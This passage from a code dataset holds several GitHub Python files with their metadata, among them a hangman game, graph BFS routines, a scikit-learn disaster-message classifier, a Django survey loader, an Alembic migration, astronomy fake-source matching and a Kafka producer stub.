yesterday,\n urllib.parse.quote_plus(\"endCreateDt\"): today,\n })\n\n res = requests.get(url + queryParams)\n print(url + queryParams)\n xml = xmltodict.parse(res.text)\n dict1 = json.loads(json.dumps(xml))\n dict_data = dict1['response']['body']['items']['item']\n\n decide_cnt = int(dict_data[0][\"decideCnt\"]) - int(dict_data[1][\"decideCnt\"])\n \n return decide_cnt\n\nif __name__ == \"__main__\":\n getDCDcnt()","repo_name":"ted1117/SmartMirror_SEE2021","sub_path":"module/covid19cnt_api.py","file_name":"covid19cnt_api.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"24168369849","text":"import sys\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QApplication\nfrom window_app.start_app import StartApp\nfrom PyQt5.QtGui import QIcon\nfrom multiprocessing import Process, Event, Value, freeze_support\nimport os\n\n\nclass Handy:\n\n def __init__(self):\n self.absolute_path = os.path.realpath(os.path.dirname(__file__))\n self.absolute_path = self.absolute_path.replace(\"\\\\\", \"/\")\n self.ui = None\n self.start_app = None\n self.start_app_widget = None\n self.app = None\n self.started = False\n self.start()\n\n def end_application(self):\n self.ui.close_application()\n\n def start_application(self):\n from window_app.main_window import Ui_main_window as win\n self.app = QtWidgets.QApplication(sys.argv)\n QtWidgets.QApplication.setWindowIcon(\n QIcon(self.absolute_path + '/logo.png'))\n self.app.setQuitOnLastWindowClosed(False)\n self.app.lastWindowClosed.connect(self.end_application)\n self.MainWindow = QtWidgets.QMainWindow()\n if self.v.value == 1:\n return\n self.ui = win(self.absolute_path)\n self.ui.setupUi(self.MainWindow)\n if self.v.value == 1:\n self.MainWindow.close()\n self.ui.close_application()\n return\n self.started = True\n self.e.set()\n try:\n self.p.terminate()\n except Exception:\n pass\n self.MainWindow.showMaximized()\n sys.exit(self.app.exec_())\n\n def start(self):\n self.v = Value('i', 0)\n self.e = Event()\n self.p = Process(target=self.start_temp_app, args=(self.e, self.v))\n self.p.daemon = True\n self.p.start()\n self.start_application()\n\n def assign(self, v):\n v.value = 1\n\n def start_temp_app(self, e, v):\n self.start_app = QApplication(sys.argv)\n self.start_app.setQuitOnLastWindowClosed(False)\n self.start_app.lastWindowClosed.connect(lambda: self.assign(v))\n QApplication.setWindowIcon(QIcon(self.absolute_path + '/logo.png'))\n self.start_app_widget = StartApp(e)\n sys.exit(self.start_app.exec_())\n\n\nif __name__ == '__main__':\n freeze_support()\n if sys.stdout is None:\n sys.stdout = open(os.devnull, \"w\")\n if sys.stderr is None:\n sys.stderr = open(os.devnull, \"w\")\n Handy()\n","repo_name":"Maurycjo/Handy-sterowanie-systemem-przy-pomocy-gestow","sub_path":"Handy.py","file_name":"Handy.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"18504392107","text":"# list of words\n# draw lines for number of letters in word\n# draw stick figure getting hung\n\nfrom art import logo, post, head, body, arms, legs\nimport os\n\nimport random\nos.system('cls' if os.name == 'nt' else 'clear')\n\n\nhang_man = {\n 0:'',\n 1:post,\n 2:head,\n 3:body,\n 4:arms,\n 5:legs\n}\n\nwordlist = [word for word in (open('words.txt','r').read().splitlines())]\nsolution = [answer for answer in random.choice(wordlist)]\n\nguess = []\n\nprint(logo)\nno_guesses = len(solution)\nguessed_letters = []\nwrong_guess = 0\ngame_started = False\nwhile no_guesses > 0 and wrong_guess <5:\n \n if not game_started:\n for letter in solution:\n guess.append('_')\n game_started = True\n print(' '.join(guess))\n \n\n player_guess = input(\"Guess a letter: \").lower()\n\n \n valid_guess = False\n if player_guess in guessed_letters: \n while not valid_guess:\n \n player_guess = input(f\"You have already guessed '{player_guess}'. Try another letter: \").lower()\n valid_guess = True\n\n if player_guess not in solution:\n wrong_guess += 1\n\n else: \n guess_index = [n for n,x in enumerate(solution) if x==player_guess]\n for i in guess_index:\n guess[i] = player_guess \n no_guesses -= 1 \n guessed_letters.append(player_guess)\n print(' '.join(guess))\n\n os.system('cls' if os.name == 'nt' else 'clear')\n print(logo)\n print(hang_man[wrong_guess])\n if wrong_guess == 5:\n print(f\"Hangman! The correct word was {''.join(solution)}.\")\n elif no_guesses == 0:\n print(f\"You are correct! The word was {''.join(solution)}.\")\n\n ","repo_name":"sprogus/Hangman","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"34691300153","text":"import ctypes\nfrom typing import Tuple, Optional\n\nimport numba\nimport numpy as np\nfrom numpy.typing import NDArray\nfrom collections import deque\n\nfrom src.library.graph.graph import Graph, TrackerCategory, Tracker\nfrom src.library.graph.verification import weighted_only, zero_weight\n\n\n@weighted_only\n@zero_weight\n@numba.jit(nopython=False, forceobj=True)\ndef binary_bfs(\n graph: Graph,\n start: int = 0,\n tracker: Optional[Tracker] = None\n) -> Tuple[NDArray, NDArray]:\n visited = np.zeros(graph.order, bool)\n visited[start] = True\n\n distance = np.full(graph.order, -1)\n distance[start] = 0\n\n traversal_tree = np.full(graph.order, -1)\n\n queue = deque([start])\n\n curr = ctypes.c_longlong(start)\n\n if tracker is not None:\n tracker.add(queue, TrackerCategory.QUEUE)\n tracker.add(distance, TrackerCategory.DISTANCE)\n tracker.add(traversal_tree, TrackerCategory.TREE)\n tracker.add(visited, TrackerCategory.VISITED)\n tracker.add(ctypes.pointer(curr), TrackerCategory.CURRENT)\n\n while len(queue) > 0:\n curr.value = queue.popleft()\n\n if tracker is not None:\n tracker.update()\n\n neighbours = graph.neighbours(curr.value)\n neighbours = neighbours[visited[neighbours] == False]\n visited[neighbours] = True\n\n neighbour_distances = graph.adj_matrix[curr.value, :]\n\n distance[neighbours] = distance[curr.value] + neighbour_distances[neighbours]\n\n traversal_tree[neighbours] = curr.value\n\n queue.extendleft(neighbours[neighbour_distances[neighbours] == 0])\n queue.extend(neighbours[neighbour_distances[neighbours] == 1])\n\n if tracker is not None:\n tracker.update()\n\n return distance, traversal_tree\n","repo_name":"integraledelebesgue/InteractiveGraphs","sub_path":"src/library/algorithms/traversals/binary_bfs.py","file_name":"binary_bfs.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"27586531420","text":"# import packages\nimport nltk\nimport numpy as np\nimport os\nimport pandas as pd\nimport pickle\nimport re\nimport sys\nimport warnings\n\nfrom nltk.corpus import stopwords\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize, sent_tokenize\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn.ensemble import AdaBoostClassifier, RandomForestClassifier\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer, TfidfVectorizer\nfrom sklearn.metrics import classification_report, confusion_matrix, precision_recall_fscore_support\nfrom sklearn.model_selection import GridSearchCV, train_test_split\nfrom sklearn.multioutput import MultiOutputClassifier\nfrom sklearn.pipeline import Pipeline, FeatureUnion\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sqlalchemy import create_engine\n\n# Loading nltk wordsets\nnltk.download(['punkt', 'wordnet', 'stopwords'])\n\ndef load_data(database_filepath):\n # Build SQL engine\n engine = create_engine(f'sqlite:///{database_filepath}')\n # Define SQL statement\n sql = 'SELECT * FROM CategorizedMessages'\n df = pd.read_sql(sql, engine)\n X = df.message\n Y = df.iloc[:, 4:]\n # Get Y labels\n Y_labels = list(Y)\n return X, Y, Y_labels\n\n\ndef tokenize(text):\n stop_words = stopwords.words(\"english\")\n lemmatizer = WordNetLemmatizer()\n # Normalize text\n text = text.lower()\n text = re.sub(r\"[^a-z0-9]\", \" \", text)\n # Tokenize text\n tokens = word_tokenize(text)\n # lemmatize and Remove stop words\n tokens = [\n lemmatizer.lemmatize(word) for word in tokens if word not in stop_words\n ]\n # Return\n return tokens\n\n\ndef build_model():\n pipeline = Pipeline([('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer(sublinear_tf=False)),\n ('clf',\n MultiOutputClassifier(\n RandomForestClassifier(n_jobs=1, \n n_estimators=100, \n random_state=179,\n criterion='entropy',\n max_depth=3,\n max_features=0.3,\n min_samples_split=3)))])\n \n parameters = {\n 'clf__estimator__min_samples_split': (3, 4),\n 'clf__estimator__max_features': ('sqrt', 0.3),\n 'clf__estimator__max_depth': (3, 5),\n 'clf__estimator__criterion': ('gini','entropy'),\n }\n \n cv = GridSearchCV(pipeline, param_grid=parameters,verbose= 10,n_jobs =-1)\n \n return cv\n\ndef evaluate_model(model, X_test, y_test, category_names):\n\n # Getting the model's predictions\n y_pred = model.predict(X_test)\n\n # Scoring the outputs\n accuracy = [[(y_pred[:, i] == y_test.values[:, i]).mean(),\n *precision_recall_fscore_support(\n y_test.values[:, i],\n y_pred[:, i],\n average='weighted',\n labels=np.unique(y_pred[:, i]))]\n for i in range(y_pred.shape[1])]\n accuracy = np.array(accuracy)[:, :-1]\n accuracy = (accuracy * 10000).astype(int) / 100\n\n print('Showing scores...')\n print('\\nAverage scores for all indicators...')\n scores = pd.DataFrame(\n data=accuracy,\n index=category_names,\n columns=['Accuracy %', 'Precision %', 'Recall %', 'F-score %'])\n print(scores.mean(axis=0))\n print('\\Detailed scores for each indicator...')\n print(scores)\n return scores\n\n\ndef save_model(model, model_filepath='NesrFittedModel'):\n '''\n Saves the {model} as {model_filepath}\n in pickle format\n Returns:\n None\n '''\n filename=model_filepath\n ## Checking if a File Exists\n #if os.path.isfile(f'./{filename}.sav'):\n # n = 0\n # while os.path.isfile(f'{filename}{n:02d}.sav'):\n # n += 1\n # else:\n # filename = f'{filename}{n:02d}.sav'\n\n # save the model to disk\n pickle.dump(model, open(filename, 'wb'))\n print(f'The model has been saved as: {filename}')\n pass\n\ndef main():\n if len(sys.argv) == 3:\n database_filepath, model_filepath = sys.argv[1:]\n print('Loading data...\\n DATABASE: {}'.format(database_filepath))\n X, Y, category_names = load_data(database_filepath)\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)\n \n print('Building model...')\n model = build_model()\n \n print('Training model...')\n model.fit(X_train, Y_train)\n \n print('Evaluating model...')\n evaluate_model(model, X_test, Y_test, category_names)\n\n print('Saving model...\\n MODEL: {}'.format(model_filepath))\n save_model(model, model_filepath)\n\n print('Trained model saved!')\n\n else:\n print('Please provide the filepath of the disaster messages database '\\\n 'as the first argument and the filepath of the pickle file to '\\\n 'save the model to as the second argument. \\n\\nExample: python '\\\n 'train_classifier.py ../data/DisasterResponse.db classifier.pkl')\n\n\nif __name__ == '__main__':\n main()","repo_name":"drnesr/DisasterResponsePipelines","sub_path":"Stage2/models/train_classifier.py","file_name":"train_classifier.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"12970421714","text":"from survey.models import Image, Survey_Collection, Image_Collection, User, Survey, Choice, Image_Transformation\nimport yaml\nimport random\n\n# Usage for a command line execution:\n# python manage.py runscript image_collection_loader --script-args survey/static/survey/collection/new_collection.yaml\n\nerrorMsg = {\n 1: \"Incorrect parameters! file.yaml is needed\",\n 2: \"The new collection doesn't have any choices for the answer!\",\n 3: \"The collection is empty!\",\n 4: \"Choices need a name!\"\n}\n\n\ndef decision(probability):\n \"\"\"\n Make a decision from a probability parameter given in input\n :param probability: Float number representing the probability\n :return: True if the random number is lower than probability number given in input, False otherwise\n \"\"\"\n return random.random() < probability\n\n\ndef apply_transformations(image_transformation, transformations, user_id):\n \"\"\"\n Calculate which transformation will be applied to the user given in input and write the list of transformations\n on the database\n :param image_transformation: instance of :model:`survey.Image_Transformation`\n :param transformations: String with the list of transformation separated by comma\n :param user_id: id of user whose want to calculate transformations\n :return: None\n \"\"\"\n image_transformation.applied_transformation = ''\n for transformation in transformations.split(','):\n probability = float(transformation.split('(')[1].split(')')[0])\n transformation = transformation.split('(')[0]\n if decision(probability):\n # Write here transformation parameter if required\n if transformation == 'contrast':\n # Setting the factor parameter in a (0.5, 1.5) threshold\n factor = \"%.2f\" % random.uniform(0.5, 1.5)\n transformation += f'({factor})'\n\n if image_transformation.applied_transformation == '':\n image_transformation.applied_transformation = transformation\n else:\n image_transformation.applied_transformation += ',' + transformation\n\n print(f\"User_id: {user_id} Applied Transformations: {image_transformation.applied_transformation}\")\n image_transformation.save()\n\n\ndef add_images(images, collection_object):\n \"\"\"\n Write image's information on the database and connect it to the corresponding Survey Collection\n :param images: A list of dictionary containing information about new images\n :param collection_object: An instance of :model:`survey.Survey_Collection`\n :return: None\n \"\"\"\n for img in images:\n path = img['path']\n name = img.get('name', (path.split('/')[-1]).split('.')[0])\n transformations = collection_object.transformations\n\n image_object = Image.objects.get_or_create(\n path=path,\n name=name,\n )[0]\n print(f\"path: {image_object.path} name: {image_object.name}\")\n image_collection_object = Image_Collection.objects.get_or_create(image_id=image_object.id,\n survey_collection_id=collection_object.id)\n image_collection_object[0].save()\n print(f\"Image_collection id: {image_collection_object[0].id} \"\n f\"Image_collection image_id: {image_collection_object[0].image_id} \"\n f\"Image_collection survey_collection_id: {image_collection_object[0].survey_collection_id}\")\n\n users_id = [user['user_id'] for user in Survey.objects.filter(\n survey_collection_id=collection_object.id).values('user_id')]\n for user_id in users_id:\n image_transformation = Image_Transformation.objects.update_or_create(\n user_id=user_id, image_collection_id=image_collection_object[0].id)[0]\n apply_transformations(image_transformation, transformations, user_id)\n\n\ndef add_users(users, collection_object):\n \"\"\"\n Write new user on database\n :param users: A list of username\n :param collection_object: An instance of :model:`survey.Survey_Collection`\n :return: None\n \"\"\"\n print(f\"Adding new Users: {users}\")\n for user in users:\n user_object = User.objects.filter(username=user).first()\n obj, created = Survey.objects.get_or_create(survey_collection_id=collection_object.id, user_id=user_object.id)\n if created:\n print(f\"User id: {user_object.id} Username: {user_object.username} added!\")\n img_collection_ids = [img_collection['id'] for img_collection in\n Image_Collection.objects.filter(survey_collection_id=collection_object.id)\n .values('id')]\n for img_collection_id in img_collection_ids:\n image_transformation = Image_Transformation.objects.update_or_create(\n user_id=user_object.id, image_collection_id=img_collection_id)[0]\n apply_transformations(image_transformation, collection_object.transformations, user_object.id)\n\n\ndef add_choices(choices, collection_object):\n \"\"\"\n Write choices on the database\n :param choices: A list of choices\n :param collection_object: An instance of :model:`survey.Survey_Collection`\n :return: None or a specific error code\n \"\"\"\n print(f\"Choices: {choices}\")\n for choice in choices:\n name = choice.get('name')\n if name is None:\n print(f\"Error: {errorMsg[4]}\")\n return 4\n\n choice_object = Choice.objects.get_or_create(name=choice['name'], survey_collection_id=collection_object.id)\n print(f\"Choice id: {choice_object[0].id} Choice name: {choice_object[0].name} \"\n f\"Collection id: {choice_object[0].survey_collection_id} added!\")\n\n\ndef add_transformations(transformations, collection_object):\n \"\"\"\n Write possibly transformations on the Survey Collection as a Transformations field\n :param transformations: List of transformations\n :param collection_object: An instance of :model:`survey.Survey_Collection`\n :return: None\n \"\"\"\n print(f\"Transformations: {transformations}\")\n transformation_field = transformations[0]\n for transformation in transformations[1:]:\n transformation_field += ',' + transformation\n\n collection_object.transformations = transformation_field\n collection_object.save()\n\n\ndef create_or_modify_collections(data):\n \"\"\"\n Function to create or modify collections by giving a yaml data object\n :param data: An yaml object obtained by yaml.load function\n :return: 0 if the function found no errors, otherwise return a specific error code\n \"\"\"\n collection = data.get('collection')\n if collection is None:\n print(f\"Error: {errorMsg[3]}\")\n return 3\n\n collection_id = collection.get('id')\n description = collection.get('description', '')\n choices = collection.get('choices')\n transformations = collection.get('transformations')\n\n if collection_id is not None:\n print(f\"Modifico la collection {collection_id}\")\n collection_object = Survey_Collection.objects.get(id=collection_id)\n print(f\"Collecion id: {collection_object.id} Collection description: {collection_object.description}\")\n\n if description != '':\n collection_object.description = description\n collection_object.save()\n print(f\"New description: {collection_object.description}\")\n\n else:\n print(\"Creo una nuova collection\")\n if choices is None:\n print(f\"Error: {errorMsg[2]}\")\n return 2\n collection_object = Survey_Collection(description=description)\n collection_object.save()\n print(f\"Collection id: {collection_object.id}\")\n\n if transformations is not None:\n add_transformations(transformations, collection_object)\n\n if choices is not None:\n add_choices(choices, collection_object)\n\n images = collection.get('images')\n if images is not None:\n add_images(images, collection_object)\n\n users = collection.get('users')\n if users is not None:\n add_users(users, collection_object)\n\n return 0\n\n\ndef run(*args):\n \"\"\"\n This function is called by runscript command of manage.py to upload a YAML Configuration File by command line\n :param args: Arguments of the function, args[0] must contain the path of YAML Configuration File\n :return: :func:`create_or_modify_collections`\n \"\"\"\n if len(args) != 1:\n print(f\"Error: {errorMsg[1]}\")\n return 1\n\n print(f\"Load: {args[0]}\")\n file = open(args[0], \"r\")\n data = yaml.load(file, Loader=yaml.FullLoader)\n print(data)\n\n return create_or_modify_collections(data)\n","repo_name":"MicheleMosca/SurveyProject","sub_path":"survey/scripts/image_collection_loader.py","file_name":"image_collection_loader.py","file_ext":"py","file_size_in_byte":8710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"11599027430","text":"import pandas as pd\nfrom dash_application.config import config\nimport psycopg2\nimport calendar\n\ndef clean_data(sme_main):\n \n sme_main.rename(columns={'Client Mobile NO': 'client_contact_no',\n 'Order ID': 'order_id', 'Client City': 'client_city', 'Client Address': 'client_address', \n 'Business': 'sme_name', 'Status': 'order_status', 'Reason of failure': 'order_reason_of_failure', \n 'Driver': 'driver_name', 'Fees': 'order_delivery_fees', 'Order Value': 'order_value','Date': 'order_date'}, inplace=True)\n #Dropping irrelevant columns and those with null values,repeating values, and incorrect order_id\n sme_main.drop(['Count','Order Status','Business Address','Business City','Viecle','Client Zone'], axis=1, inplace=True)\n #Dropping negative order values, null or incorrect IDs and contact numbers and null client addresses\n sme_main = sme_main[sme_main['order_value']>=0]\n sme_main.dropna(subset=['order_id','client_contact_no','client_address'], inplace=True) \n sme_main.drop(sme_main[(sme_main['order_id']< 100000) ].index,inplace=True)\n sme_main.drop(sme_main[(sme_main['order_id']> 999999) ].index,inplace=True)\n sme_main.drop(sme_main[(sme_main['client_contact_no']> 999999999) ].index,inplace=True)\n sme_main.drop(sme_main[(sme_main['client_contact_no']< 100000000) ].index,inplace=True)\n #One of the order statuses was null and after referring to the org, delivered was replaced\n sme_main[['order_status']] = sme_main[['order_status']].fillna('Delivered')\n #Formatting date\n try:\n sme_main['order_date']=pd.to_datetime(sme_main['order_date'],format='%Y-%m-%d')\n except:\n sme_main['order_date']=pd.to_datetime(sme_main['order_date'],format='%m/%d/%Y')\n #exporting the cleaned data to csv to then be uploaded into the database\n sme_main.to_csv('dash_application/csv/order_table.csv', index=False)\n #Creating new features\n sme_main['day'] = pd.DatetimeIndex(sme_main['order_date']).day\n sme_main['year'] = pd.DatetimeIndex(sme_main['order_date']).year\n sme_main['month']= pd.DatetimeIndex(sme_main['order_date']).month\n sme_main['week'] = (sme_main['order_date'].dt.strftime('%W').astype(int) + 1)\n sme_main['month_name'] = sme_main['month'].apply(lambda x: calendar.month_name[x])\n #calculating stakeholders individual shares\n sme_main['driver_fee'] = sme_main['order_delivery_fees']*0.7\n sme_main['halan_return'] = sme_main['order_delivery_fees']*0.3\n sme_main['sme_return'] = sme_main['order_value'] - sme_main['order_delivery_fees']\n\n return sme_main\n \ndef parseCSV(filePath,user_id):\n sme_main = pd.read_csv(filePath)\n sme_main = clean_data(sme_main)\n # sme_main.to_csv('dash_application/csv/sme_main.csv', index=False)\n\n with open('dash_application/csv/order_table.csv', 'r') as f: \n params = config()\n conn = psycopg2.connect(**params)\n cursor = conn.cursor() \n cmd = 'COPY sme_main(client_contact_no,order_id, client_city,client_address, sme_name,order_status,order_reason_of_failure,driver_name,order_delivery_fees, order_value, order_date) FROM STDIN WITH (FORMAT CSV, HEADER TRUE)'\n cursor.copy_expert(cmd, f)\n conn.commit()\n\n\n ","repo_name":"blackatron/Halan_Dashboard","sub_path":"dash_application/upload_data.py","file_name":"upload_data.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14202272238","text":"import sys\n\ninput = sys.stdin.readline\n\ninf = 10000\nn, m = map(int, input().split())\ngraph = [[] for _ in range(n + 1)]\nmin_sum = 20000\nanswer = -1\nq = []\n\nfor _ in range(m):\n a, b = map(int, input().split())\n graph[a].append(b)\n graph[b].append(a)\n\nfor i in range(1, n + 1):\n check = [False] * (n + 1)\n check[i] = True\n q.append(i)\n sum = 0\n depth = -1\n while q:\n depth += 1\n for _ in range(len(q)):\n cur = q.pop(0)\n sum += depth\n for near in graph[cur]:\n if not check[near]:\n check[near] = True\n q.append(near)\n if sum < min_sum:\n min_sum = sum\n answer = i\nprint(answer)\n","repo_name":"ttasjwi/algorithm","sub_path":"문제풀이/온라인 저지/백준/# 10. Silver Ⅰ/# 01389. 케빈 베이컨의 6단계 법칙/python/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"21735380610","text":"#!/usr/bin/env python\n\"\"\"\nrunMatchFakes.py\nmatches fakes based on position stored in the calibrated exposure image header\n\"\"\"\n\nimport argparse\nimport fakes.matchFakes as matchFakes\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('rootDir', help='root dir of data repo')\n parser.add_argument('visit',\n help='id of visit (or tract, if filter is specified)',\n type=int)\n parser.add_argument('-f', '--filter', dest='filt',\n help='name of filter, if none assume single visit',\n default=None)\n parser.add_argument('--ccd', nargs='+', help='id of ccd(s) or patches')\n parser.add_argument('-o', help='outputfilename', default=None,\n dest='outfile')\n parser.add_argument('-c', help='fake catalog', default=None,\n dest='fakeCat')\n parser.add_argument('-w', '--overwrite', help='overwrite output file',\n dest='ow', default=False, action='store_true')\n parser.add_argument('-m', '--multiband',\n help='Match multiband measurements',\n dest='multiband', default=False, action='store_true')\n parser.add_argument('-t', '--tolerance', type=float, dest='tol',\n default=1.0,\n help='matching radius in PIXELS (default=1.0)')\n parser.add_argument('-p', '--pixelMatch', default=False,\n action='store_true',\n help='do a pixel position match based on the header')\n parser.add_argument('-r', '--reffMatch',\n help='Match the fake sources using tol x Reff',\n dest='reffMatch', default=False, action='store_true')\n parser.add_argument('--min', '--minRad',\n help='Min matching radius (pixel) when -r is set',\n dest='minRad', type=float, default=None)\n parser.add_argument('-j', '--multijobs', type=int,\n help='Number of jobs run at the same time',\n dest='multijobs', default=1)\n parser.add_argument('--ra', '--raCol', dest='raCol',\n help='Name of the column for RA',\n default='RA')\n parser.add_argument('--dec', '--decCol', dest='decCol',\n help='Name of the column for Dec',\n default='Dec')\n args = parser.parse_args()\n\n if (args.ccd is None) or (len(args.ccd) < 1):\n if args.filt is None:\n args.ccd = range(104)\n else:\n \"\"\"hack, assumes 11x11 patches per CCD\"\"\"\n args.ccd = ['%d,%d' % (x, y) for x in range(11) for y in range(11)]\n\n matchFakes.returnMatchTable(args.rootDir, args.visit, args.ccd,\n args.outfile, args.fakeCat,\n overwrite=args.ow, filt=args.filt,\n tol=args.tol,\n pixMatch=args.pixelMatch,\n multiband=args.multiband,\n reffMatch=args.reffMatch,\n multijobs=args.multijobs,\n minRad=args.minRad,\n raCol=args.raCol, decCol=args.decCol)\n","repo_name":"dr-guangtou/synpipe","sub_path":"bin/runMatchFakes.py","file_name":"runMatchFakes.py","file_ext":"py","file_size_in_byte":3365,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"} +{"seq_id":"24661298985","text":"'''\n\n\n주사위 쌓기\n\n\n\n주사위를 수직으로 쌓을때 서로 맞닿은 부분의 눈이 같아야하고 전부다 쌓았을 때 양옆 주사위 눈의 합의 최대값을 구하는 문제이다.\n\n\n주사위 눈은 1-6, 2-4, 3-5가 서로 위아래로 짝지어져있기 때문에 반대편은 자동적으로 따라온다.\n\n나는 주사위 눈을 짝지어서 배열에 저장했다.\n\n전체 주사위를 돌면서 저장한 주사위 눈의 짝에서 값을 찾고 반대쪽을 다음 대상으로 바꿔가면서 반복문을 진행했다.\n\n#\n#\n# 양옆의 숫자중 최대값은 4,5,6중 하나이므로 6,5가 있는지 체크해서 최대값을 구해서 더해나갔다.\n#\n#\n# '''\n#\n#\n#\nfrom sys import stdin\ninput = stdin.readline\n\n\nn = int(input())\n\n\ndices = [[] for _ in range(n)]\nanswer = 0\n\nfor idx in range(n):\n nums = list(map(int, input().split()))\n\n dices[idx].append((nums[0], nums[5]))\n dices[idx].append((nums[1], nums[3]))\n dices[idx].append((nums[2], nums[4]))\n\n#[[(2, 4), (3, 6), (1, 5)],\n# [(3, 5), (1, 4), (2, 6)],\n# [(5, 2), (6, 1), (4, 3)],\n# [(1, 5), (3, 2), (6, 4)],\n# [(4, 3), (1, 5), (6, 2)]]\n\n\n\n\n\n\ndef solv():\n for dice in dices[0]:\n for target in dice:\n # print(target)\n select_num(target)\n print(answer)\n\n\n\ndef select_num(target):\n global answer\n total = 0\n\n for idx in range(n):\n for dice in dices[idx]:\n if target in dice:\n if 6 in dice:\n if 5 in dice:\n total += 4\n else:\n total += 5\n else:\n total += 6\n if target == dice[0]:\n target = dice[1] # 그 다음 번호 확인 하려는?!\n break\n\n else:\n target = dice[0] #타켓의 값을 다이스에 첫번째로,,\n break\n answer = max(answer, total)\n\nsolv()\n","repo_name":"joojeehwan/algo_jjh","sub_path":"test_im/baekjoon/2116.py","file_name":"2116.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19581500299","text":"\"\"\"quiz, question, answer tables\n\nRevision ID: 8fed53710991\nRevises: f60ef54bc8fb\nCreate Date: 2023-03-19 13:45:59.115260\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '8fed53710991'\ndown_revision = 'f60ef54bc8fb'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('quizzes',\n sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True),\n sa.Column('updated_at', sa.DateTime(timezone=True), nullable=True),\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('company_id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(), nullable=False),\n sa.Column('description', sa.String(), nullable=True),\n sa.Column('frequency', sa.Integer(), nullable=False),\n sa.Column('created_by', sa.Integer(), nullable=False),\n sa.Column('updated_by', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['company_id'], ['companies.id'], ),\n sa.ForeignKeyConstraint(['created_by'], ['users.id'], ),\n sa.ForeignKeyConstraint(['updated_by'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('company_id', 'name', name='company_name_uc')\n )\n op.create_index(op.f('ix_quizzes_id'), 'quizzes', ['id'], unique=False)\n op.create_table('quiz_questions',\n sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True),\n sa.Column('updated_at', sa.DateTime(timezone=True), nullable=True),\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('quiz_id', sa.Integer(), nullable=False),\n sa.Column('content', sa.String(), nullable=False),\n sa.ForeignKeyConstraint(['quiz_id'], ['quizzes.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_quiz_questions_id'), 'quiz_questions', ['id'], unique=False)\n op.create_table('quiz_answers',\n sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True),\n sa.Column('updated_at', sa.DateTime(timezone=True), nullable=True),\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('question_id', sa.Integer(), nullable=False),\n sa.Column('correct', sa.Boolean(), nullable=False),\n sa.Column('content', sa.String(), nullable=False),\n sa.ForeignKeyConstraint(['question_id'], ['quiz_questions.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_quiz_answers_id'), 'quiz_answers', ['id'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_quiz_answers_id'), table_name='quiz_answers')\n op.drop_table('quiz_answers')\n op.drop_index(op.f('ix_quiz_questions_id'), table_name='quiz_questions')\n op.drop_table('quiz_questions')\n op.drop_index(op.f('ix_quizzes_id'), table_name='quizzes')\n op.drop_table('quizzes')\n # ### end Alembic commands ###\n","repo_name":"mys1erious/meduzzen-knowledge-control","sub_path":"alembic/versions/2023-03-19_13-45_quiz_question_answer_tables.py","file_name":"2023-03-19_13-45_quiz_question_answer_tables.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"6815343938","text":"import socket\nimport json\nfrom confluent_kafka import Producer\n\nconf = {\n 'bootstrap.servers': \"localhost:9092,localhost:9092\",\n 'client.id': socket.gethostname()\n}\n\nproducer = Producer(conf)\n\n\ndef cbfunction(err, msg):\n if err is not None:\n print(\"Mesaj oluşturulurken bir hata oluştu: %s: %s\" %\n (str(msg), str(err)))\n else:\n print(\"Mesaj oluşturuldu\")\n\n\n# json objesi olarak mesajı oluşturuyoruz\njsonObj = {\n \"message\": \"Sonunda mesajı database'e yollayabiliyoz.\"\n}\n# json objesini json string'e çeviriyoruz.\njsonStr = 